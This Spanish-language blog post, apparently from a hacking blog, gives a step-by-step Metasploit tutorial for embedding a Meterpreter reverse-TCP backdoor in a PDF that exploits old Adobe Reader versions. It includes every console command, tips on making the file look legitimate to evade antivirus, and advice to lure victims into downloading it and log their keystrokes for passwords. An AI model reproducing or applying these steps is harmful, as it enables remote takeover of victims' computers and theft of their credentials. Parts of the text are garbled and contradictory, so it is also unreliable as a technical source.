Hacking Avanzado en PDF (Backdoor/Backtrack)

Hacking avanzado. Inyectar un Backdoor en un PDF y tomar el control total de una PC.



DistribuciĆ³n de software malicioso dentro de documentos PDF de Adobe

DistribuciĆ³n de software malicioso dentro de documentos PDF de Adobe
Esta vez, les darĆ© una preve lecciĆ³n de como   inyecciĆ³n un (rootkit) dentro de un archivo PDF, explotando una vulnerabilidad en Adobe Reader.

DistribuciĆ³n de software malicioso dentro de documentos PDF de Adobe es un mĆ©todo popular para los atacantes, para comprometer sistemas.  

Dentro de las Ćŗltimas versiones de Reader, Adobe ha aƱadido mĆŗltiples actualizaciones para solucionar vulnerabilidades. AdemĆ”s, Adobe ha aƱadido una capacidad de caja de arena en el software  Reader, que se activa si los atacantes utilizan vulnerabilidades de PDF para intentar explotar de un sistema. Debido a esta adiciĆ³n caja de arena, los atacantes se quedan con un acceso extremadamente limitado y temporal, limitando lo que puede lograrse.
 
Hackers-v-Adobe

 Vamos a empezar por examinar cĆ³mo se construyen los archivos PDF. Los siguientes son los principales componentes de un archivo PDF.
 
PDF Header
  
La primera lĆ­nea de un archivo PDF muestra la versiĆ³n en formato pdf. Por ejemplo, "% PDF-1.4 significa que es cuarta versiĆ³n del archivo.
 
 PDF Cuerpo
 
El cuerpo del archivo PDF se compone de objetos que se utilizan para definir el contenido del documento. Estos objetos incluyen fuentes, imĆ”genes, anotaciones y flujos de texto. Los usuarios tambiĆ©n pueden insertar objetos o elementos invisibles en el cuerpo del documento, lo que puede permitir a las caracterĆ­sticas PDF como funciones de animaciĆ³n o de seguridad.
 
La tabla de referencias cruzadas (cuadro de referencia externa)

 La tabla de referencias cruzadas vincula todos los objetos y elementos que existen en el documento, y se almacena en formato de archivo. Puede utilizar esta funciĆ³n para ver otros contenidos de la pĆ”gina. Cuando los usuarios actualizan un documento PDF, la tabla de referencias cruzadas tambiĆ©n se actualiza automĆ”ticamente.
 
El Remolque

El Remolque contiene enlaces a la tabla de referencias cruzadas y siempre tiene %% EOF al final, que identifica el final de un archivo PDF. El remolque permite al usuario navegar a la siguiente pƔgina, haga clic en el enlace proporcionado.
 
Desde la perspectiva atacante ...
PDF malicioso a travƩs de Metasploit

Vamos a utilizar Metasploit en Backtrack para crear un archivo PDF malicioso.
 
Este exploit se pueden crear en el marco de Metasploit, asƭ que vamos a crear el PDF malicioso y luego realizar un anƔlisis en Backtrack en tiempo real.
 
Queremos ganar acceso a una consola en el ordenador de la vĆ­ctima y ejecutar un capturador de teclado para recoger contraseƱas u otra informaciĆ³n crĆ­tica.
 
Comenzamos por la carga de nuestra msfconsole. Una guƭa que les podrƭa servir en la seguridad informƔtica estƔ aquƭ abajo.
 
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/

Pero la mayorƭa de las guias de Offensive Security son en inglƩs.
 
Por otro lado..
Queremos poner nuestras habilidades de ingenierĆ­a social para la prueba aquĆ­. Recomiendo que cuando practicas crear estos archivos, intenta hacer que su archivo PDF se vea tan legĆ­tima como sea posible. 

Esto construye buenos hĆ”bitos. TambiĆ©n querer evitar los sistemas antivirus y capacidades de detecciĆ³n de malware, proporcionando a su archivo PDF con un buen tĆ­tulo, pĆ”ginas adecuadas, y el contenido legĆ­timo.

 
Adobe Reader es propenso a una vulnerabilidad de desbordamiento de bĆŗfer basado en pila porque la aplicaciĆ³n no puede realizar comprobaciones de lĆ­mites adecuados sobre los datos suministrados por el usuario. 

 Un atacante puede aprovechar este problema y ejecutar cĆ³digo arbitrario mediante el acceso a los privilegios de un usuario vĆ”lido que se ejecuta la aplicaciĆ³n. 

 El atacante tambiĆ©n puede bloquear la aplicaciĆ³n, lo que se traduce en el servicio negado a los usuarios legĆ­timos.
Aunque se trata de una vulnerabilidad mayor, muchas vulnerabilidades nuevas funcionan de una manera similar. 

 Los atacantes, generalmente, tratar de tomar ventaja de un ataque de dĆ­a cero con el fin de lograr resultados similares a lo que vamos a ver aquĆ­.
 
Vamos a empezar por la creaciĆ³n de nuestro archivo PDF malicioso para su uso en este lado del cliente exploit.


La vulnerabilidad

Adobe ha tenido numerosos problemas de seguridad con sus productos, incluyendo Problema AdoEl

Entre los productos de Adobe mƔs utilizados es Reader.
 
Casi todos los equipos tienen alguna versiĆ³n de Adobe Reader en Ć©l para la lectura de archivos PDF.
 
Es probable que tu lo tengas tambiƩn. Pero, la mayorƭa de las personas no son conscientes de los problemas de seguridad que Reader ha experimentado y que dejar de actualizar o parchear.

De acuerdo con el fabricante de software antivirus Avast, mĆ”s del 60 por ciento de las computadoras tiene Adobe Reader 9 o instalado antes, a pesar de que la nueva versiĆ³n es 11. 
 
Por lo tanto, hoy vamos a explotar esos equipos con Adobe Reader 9 o anterior.

El Exploit

En este exploit, vamos a modificar un archivo .pdf existente que luego puede ser publicado en nuestra pƔgina web. Cuando los amigos u otras personas que descarga, se abrirƔ un oyente (un rootkit) en su sistema y nos dan un control total de su ordenador de forma remota.

Vamos a empezar por abrir Metasploit. Si no ha actualizado su Metasploit , este serĆ­a un buen momento para hacerlo. Simplemente escriba msfupdate en el indicador de MSF.

Paso 1: Encuentra el exploit  adecuado

En primer lugar, vamos a encontrar el exploit adecuado en Metasploit buscando uno que va a utilizar esta versiĆ³n de Adobe Reader: 
 
msf > search type:exploit platform:windows adobe pdf
 
 
 
 
 
 
 
En la imagen anterior podemos ver que Metasploit enumerĆ³ todas las hazaƱas que cumplieron con los criterios.
 
Usemos el "exploit/windows/fileformat/adobe_pdf_embedded_exe".
 
Comando:
 
 msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Paso 2: Reunir informaciĆ³n sobre este Exploit

Ahora echemos un vistazo a la informaciĆ³n de que disponemos acerca de este exploit con el siguente comando: 
 
msf > exploit (adobe_pdf_embedded_exe) > info
 
 
 
 
 
 
 
 
Tenga en cuenta que en la descripciĆ³n, Metasploit nos dice que incrusta un payload en un archivo PDF existente. El PDF resultante puede ser enviada a un objetivo como parte de un ataque de ingenierĆ­a social. :)



AdemĆ”s de enviar por una red social a la vĆ­ctima, tambiĆ©n se puede incrustar con un script en lenguaje de html en un sitio web (UsarĆ© IMVU como ejemplo) DespuĆ©s invitaremos a la vĆ­ctima  a descargarlo.
 
 
 

 

Paso 3: Configurar Nuestra Payload

En nuestro siguiente paso, tenemos que inyectar nuestro payload   en el PDF. 
 
Escribe:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Paso 4: Establecer opciones

Ahora que hemos elegido nuestri exploit y configurar nuestro payload, lo Ćŗnico que queda por hacer es configurar nuestras opciones. Echemos un vistazo a las opciones para esta hazaƱa y el payload, escribiendo el siguente comando:
 
msf > exploit (adobe_pdf_embedded_exe) > show options
 
 
 
 
 
 
 
 
 
 
Como se puede ver en la imagen anterior, Metasploit nos obliga a dar un PDF existente donde se puede incrustar el Meterpreter.
 
Vamos a establecer un archivo llamado hackedpfd.pdf (asegurarse de que este archivo se creĆ³ con Reader 9 o anterior), con nuestra opciĆ³n INFILENAME.msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME hackedpdf.pdf
 
A continuaciĆ³n, cambie el nombre de archivo predeterminado del archivo de salida con el Meterpreter incorporado para la misma Hackedpdf.pdf, ya que eso suena malicioso. XD
 
El nombre predeterminado es backdoor.pdf
 
 msf > exploit (adobe_pdf_embedded_exe) > set FILENAME backdoor.pdf
 
A continuaciĆ³n, establezca el LHOST (nuestro sistema) a nuestra direcciĆ³n IP o 192.168.100.1.

msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1

 

Paso 5: Compruebe los ajustes

 

Ahora, vamos a ver nuestras opciones de nuevo para ver si todo estĆ” listo para el hackeo.msf > exploit (adobe_pdf_embedded_exe) > show options

 

 

 

Paso 6: Exploit! :)

Como se puede ver en la imagen de arriba, todas nuestras opciones se establecen todo lo que necesitamos hacer ahora es darle exploit

msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit ha creado un backdoor.pdf llamado PDF que contiene el rootkit Meterpeter. Metasploit ha colocado este archivo en /root/.msf4/local/backdoor.pdf.


 
Basta con copiar este archivo en cualquier  sitio web e invitar a los visitantes a descargarlo. Cuando nuestra victima/s  abren este archivo , se abrirĆ” una conexiĆ³n con el sistema que se puede utilizar para correr y tener control de su sistema completo.




 


Ɖste tutorial te servirĆ” una vez que tengas el control de la PC con Meterpreter, donde verĆ”s todo lo que puedes hacer una vez teniendo acceso a la PC.
 

http://cyberattacking.blogspot.mx/2015/10/hacking-completo-una-pc-meterpreter.html 

Suerte!


Exploit

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Instagram